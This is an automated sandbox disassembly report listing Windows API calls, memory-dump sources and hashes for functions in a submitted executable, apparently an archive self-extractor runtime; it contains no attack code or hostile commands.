                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2252061734-0
                                                                                                                                                                                              • Opcode ID: 863c72c4e4af84c18aa2fc080df0bbb8cf1632aa9b437eb0952ebf0b0d5742c8
                                                                                                                                                                                              • Instruction ID: 5451de17f59e0acf918b99e76a44415a3f673a47eb295e93146cb1f5100f0c19
                                                                                                                                                                                              • Opcode Fuzzy Hash: 863c72c4e4af84c18aa2fc080df0bbb8cf1632aa9b437eb0952ebf0b0d5742c8
                                                                                                                                                                                              • Instruction Fuzzy Hash: 0251BF72A00213AFDB698F14DA47FAA73A4FF64320F24412DE802576A1DB35ED41F790
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 00FCBF39
                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00FCBF5C
                                                                                                                                                                                                • Part of subcall function 00FC8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00FCCA2C,00000000,?,00FC6CBE,?,00000008,?,00FC91E0,?,?,?), ref: 00FC8E38
                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00FCBF82
                                                                                                                                                                                              • _free.LIBCMT ref: 00FCBF95
                                                                                                                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00FCBFA4
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 336800556-0
                                                                                                                                                                                              • Opcode ID: f2850771b539b813642150c2abbb093fa9c1315a0f50df64777b8b1be43071ca
                                                                                                                                                                                              • Instruction ID: fc552818d5ac17b3ebf74501cb74e54b5f1d13d13e95cf72544e7de7d2ee0696
                                                                                                                                                                                              • Opcode Fuzzy Hash: f2850771b539b813642150c2abbb093fa9c1315a0f50df64777b8b1be43071ca
                                                                                                                                                                                              • Instruction Fuzzy Hash: A501B17AE022177F232116BA5D4BE7B7B6DDEC2BA1714012EFA04C2204EF608D02F5B1
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00FC91AD,00FCB188,?,00FC9813,00000001,00000364,?,00FC3F73,00000050,?,00FE1030,00000200), ref: 00FC986E
                                                                                                                                                                                              • _free.LIBCMT ref: 00FC98A3
                                                                                                                                                                                              • _free.LIBCMT ref: 00FC98CA
                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,00FE1030,00000200), ref: 00FC98D7
                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,00FE1030,00000200), ref: 00FC98E0
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorLast$_free
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3170660625-0
                                                                                                                                                                                              • Opcode ID: 6e0b5d45a2956022c7bd0a28eaaf04b1e8518bc0b8d6c5d305496349bf663ad7
                                                                                                                                                                                              • Instruction ID: 4e75122f65ee413d5b18bb2848aaf5bab67fd54b4267332f5edee854f0ac56fa
                                                                                                                                                                                              • Opcode Fuzzy Hash: 6e0b5d45a2956022c7bd0a28eaaf04b1e8518bc0b8d6c5d305496349bf663ad7
                                                                                                                                                                                              • Instruction Fuzzy Hash: 7201213750A6076B83122339AF8FF1A362ADBC2774761013EF611931D2EEA48C067265
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00FB11CF: ResetEvent.KERNEL32(?), ref: 00FB11E1
                                                                                                                                                                                                • Part of subcall function 00FB11CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00FB11F5
                                                                                                                                                                                              • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00FB0F21
                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?), ref: 00FB0F3B
                                                                                                                                                                                              • DeleteCriticalSection.KERNEL32(?), ref: 00FB0F54
                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00FB0F60
                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00FB0F6C
                                                                                                                                                                                                • Part of subcall function 00FB0FE4: WaitForSingleObject.KERNEL32(?,000000FF,00FB1206,?), ref: 00FB0FEA
                                                                                                                                                                                                • Part of subcall function 00FB0FE4: GetLastError.KERNEL32(?), ref: 00FB0FF6
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1868215902-0
                                                                                                                                                                                              • Opcode ID: 304b0fc1e51f998761698d0b6f3138bbfeca07acaf81d7d4f4ebbb37e2f0b6ac
                                                                                                                                                                                              • Instruction ID: a11a7e8cc60a8f40ab58c3497304f83047dac368a1f30d9640bdf49f4f51d11c
                                                                                                                                                                                              • Opcode Fuzzy Hash: 304b0fc1e51f998761698d0b6f3138bbfeca07acaf81d7d4f4ebbb37e2f0b6ac
                                                                                                                                                                                              • Instruction Fuzzy Hash: BE017172501744EFC7229B75DC88BC6FBAAFB08714F00092AF26B92560CB757A45EB91
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • _free.LIBCMT ref: 00FCC817
                                                                                                                                                                                                • Part of subcall function 00FC8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00FCC896,?,00000000,?,00000000,?,00FCC8BD,?,00000007,?,?,00FCCCBA,?), ref: 00FC8DE2
                                                                                                                                                                                                • Part of subcall function 00FC8DCC: GetLastError.KERNEL32(?,?,00FCC896,?,00000000,?,00000000,?,00FCC8BD,?,00000007,?,?,00FCCCBA,?,?), ref: 00FC8DF4
                                                                                                                                                                                              • _free.LIBCMT ref: 00FCC829
                                                                                                                                                                                              • _free.LIBCMT ref: 00FCC83B
                                                                                                                                                                                              • _free.LIBCMT ref: 00FCC84D
                                                                                                                                                                                              • _free.LIBCMT ref: 00FCC85F
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                              • Opcode ID: 63e7195baf277fea71eaf1da59797a5805a51eb6f52c075b3c1748da963d207a
                                                                                                                                                                                              • Instruction ID: 7bd3da4a1415c6fc96145aedbc2365eca424ec1ac0705247ef8a62c49dfd7a7c
                                                                                                                                                                                              • Opcode Fuzzy Hash: 63e7195baf277fea71eaf1da59797a5805a51eb6f52c075b3c1748da963d207a
                                                                                                                                                                                              • Instruction Fuzzy Hash: F2F06832901106ABC610EB78FA87E0773EAAA00760756081EF14DDB5D1CB74FC41E790
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00FB1FE5
                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00FB1FF6
                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00FB2006
                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00FB2014
                                                                                                                                                                                              • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,00FAB371,?,?,00000000,?,?,?), ref: 00FB202F
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: _wcslen$CompareString
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3397213944-0
                                                                                                                                                                                              • Opcode ID: c0be9d8d3b13b72cd0a5397612c0c771fae3504d9db72c94eb8f81e78c072d95
                                                                                                                                                                                              • Instruction ID: 016f43e089ec16843e01084e2303f551df33764c8deb7918ee2f2e6260d2b10e
                                                                                                                                                                                              • Opcode Fuzzy Hash: c0be9d8d3b13b72cd0a5397612c0c771fae3504d9db72c94eb8f81e78c072d95
                                                                                                                                                                                              • Instruction Fuzzy Hash: 66F01D33008019BBCF226F51EC0AECA7F26EB447A0B11C419F61A5B062CB729665EB90
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • _free.LIBCMT ref: 00FC891E
                                                                                                                                                                                                • Part of subcall function 00FC8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00FCC896,?,00000000,?,00000000,?,00FCC8BD,?,00000007,?,?,00FCCCBA,?), ref: 00FC8DE2
                                                                                                                                                                                                • Part of subcall function 00FC8DCC: GetLastError.KERNEL32(?,?,00FCC896,?,00000000,?,00000000,?,00FCC8BD,?,00000007,?,?,00FCCCBA,?,?), ref: 00FC8DF4
                                                                                                                                                                                              • _free.LIBCMT ref: 00FC8930
                                                                                                                                                                                              • _free.LIBCMT ref: 00FC8943
                                                                                                                                                                                              • _free.LIBCMT ref: 00FC8954
                                                                                                                                                                                              • _free.LIBCMT ref: 00FC8965
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                              • Opcode ID: b4f41a257605cc32aa779229b32444452091e019f8e5f77c746d2ce0863cbe0e
                                                                                                                                                                                              • Instruction ID: 42149c86102f422074d2c5cb9e61e029b10cb0798609926d5967f396abdaa5f9
                                                                                                                                                                                              • Opcode Fuzzy Hash: b4f41a257605cc32aa779229b32444452091e019f8e5f77c746d2ce0863cbe0e
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5DF03A759121279BC6277F28FE079053BA2F728760B02050AF055562AACF3E4943FB81
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: _swprintf
                                                                                                                                                                                              • String ID: %ls$%s: %s
                                                                                                                                                                                              • API String ID: 589789837-2259941744
                                                                                                                                                                                              • Opcode ID: e7fe27699327b3296192e4f2f13419bc6c88e029c8017acd93814143fd274069
                                                                                                                                                                                              • Instruction ID: 5caf55ce9d4c9b0a0544d76ff7db337fb486709a6fd7cb8a04a06a0148baf851
                                                                                                                                                                                              • Opcode Fuzzy Hash: e7fe27699327b3296192e4f2f13419bc6c88e029c8017acd93814143fd274069
                                                                                                                                                                                              • Instruction Fuzzy Hash: 86513837288300F6F7211A928C66FF67366BB06B04FB44916F796650E1C9A7E410BF1B
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\YGk3y6Tdix.exe,00000104), ref: 00FC7FAE
                                                                                                                                                                                              • _free.LIBCMT ref: 00FC8079
                                                                                                                                                                                              • _free.LIBCMT ref: 00FC8083
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: _free$FileModuleName
                                                                                                                                                                                              • String ID: C:\Users\user\Desktop\YGk3y6Tdix.exe
                                                                                                                                                                                              • API String ID: 2506810119-1997765088
                                                                                                                                                                                              • Opcode ID: fd1798abc8782d9ef338f26c2a7fd43432e7d2442bab494e55e72b5580e2d7b4
                                                                                                                                                                                              • Instruction ID: cff47a55febc15c659a0d13b5a2c1ac24a1e1b534143c70c8a3de237ca2e2f52
                                                                                                                                                                                              • Opcode Fuzzy Hash: fd1798abc8782d9ef338f26c2a7fd43432e7d2442bab494e55e72b5580e2d7b4
                                                                                                                                                                                              • Instruction Fuzzy Hash: 3F31C271E4021AAFCB21DF98DE86E9EBBBCEB84350F10406EF40497200DB758E46EB51
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00FC31FB
                                                                                                                                                                                              • _abort.LIBCMT ref: 00FC3306
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: EncodePointer_abort
                                                                                                                                                                                              • String ID: MOC$RCC
                                                                                                                                                                                              • API String ID: 948111806-2084237596
                                                                                                                                                                                              • Opcode ID: bb02967f6487e55b8ecd535e45f0ea5dd68cef6d19e20abea399bc05848140ab
                                                                                                                                                                                              • Instruction ID: cdb196b1ec2d926e0d2cd8c045ab31706c6e69ac63981eb6dc0cb9c1578b49c7
                                                                                                                                                                                              • Opcode Fuzzy Hash: bb02967f6487e55b8ecd535e45f0ea5dd68cef6d19e20abea399bc05848140ab
                                                                                                                                                                                              • Instruction Fuzzy Hash: 41414672D0020AAFCF15DF98CE82FEEBBB5AF08354F198059F905A6211D735AA50EB50
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 00FA7406
                                                                                                                                                                                                • Part of subcall function 00FA3BBA: __EH_prolog.LIBCMT ref: 00FA3BBF
                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00FA74CD
                                                                                                                                                                                                • Part of subcall function 00FA7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00FA7AAB
                                                                                                                                                                                                • Part of subcall function 00FA7A9C: GetLastError.KERNEL32 ref: 00FA7AF1
                                                                                                                                                                                                • Part of subcall function 00FA7A9C: CloseHandle.KERNEL32(?), ref: 00FA7B00
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                                                                                                                                                              • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                                                                                                                              • API String ID: 3813983858-639343689
                                                                                                                                                                                              • Opcode ID: 7250ade22076dba811762b5deeed81d49b420253d8d0efe05148cf3cc79b4b68
                                                                                                                                                                                              • Instruction ID: 01719ef14776d273e227d57717f5de96e28da53adefe708b1f05aadfe9597baa
                                                                                                                                                                                              • Opcode Fuzzy Hash: 7250ade22076dba811762b5deeed81d49b420253d8d0efe05148cf3cc79b4b68
                                                                                                                                                                                              • Instruction Fuzzy Hash: 3831C3F1D04348AEDF11EBA4DC45FEE7BA9BF4A350F084015F905A7282CB789A44EB61
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00FA1316: GetDlgItem.USER32(00000000,00003021), ref: 00FA135A
                                                                                                                                                                                                • Part of subcall function 00FA1316: SetWindowTextW.USER32(00000000,00FD35F4), ref: 00FA1370
                                                                                                                                                                                              • EndDialog.USER32(?,00000001), ref: 00FBAD98
                                                                                                                                                                                              • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00FBADAD
                                                                                                                                                                                              • SetDlgItemTextW.USER32(?,00000066,?), ref: 00FBADC2
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ItemText$DialogWindow
                                                                                                                                                                                              • String ID: ASKNEXTVOL
                                                                                                                                                                                              • API String ID: 445417207-3402441367
                                                                                                                                                                                              • Opcode ID: 250b32da2c60224409a8779b88daa2db07befe94fc978b6a693c41e3474f0517
                                                                                                                                                                                              • Instruction ID: 2dd2acccc4d5c5f830ace1889ec49326c8fbac0282a42b09ea19a2bad3e2c921
                                                                                                                                                                                              • Opcode Fuzzy Hash: 250b32da2c60224409a8779b88daa2db07befe94fc978b6a693c41e3474f0517
                                                                                                                                                                                              • Instruction Fuzzy Hash: E9119332644200BFD7229F69DC45FEA776DEF4F752F400410F281DB594C766D805AB22
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • __fprintf_l.LIBCMT ref: 00FAD954
                                                                                                                                                                                              • _strncpy.LIBCMT ref: 00FAD99A
                                                                                                                                                                                                • Part of subcall function 00FB1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00FE1030,00000200,00FAD928,00000000,?,00000050,00FE1030), ref: 00FB1DC4
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                                                                                                                                                              • String ID: $%s$@%s
                                                                                                                                                                                              • API String ID: 562999700-834177443
                                                                                                                                                                                              • Opcode ID: f468888c1ff74768b751bcd0d887835978e6808c2e9b046f574a3f82a56375d3
                                                                                                                                                                                              • Instruction ID: cf0caeb0b3de44bd009c128498cec9af6c875a7c44d0007227e7ba2d76a9b12e
                                                                                                                                                                                              • Opcode Fuzzy Hash: f468888c1ff74768b751bcd0d887835978e6808c2e9b046f574a3f82a56375d3
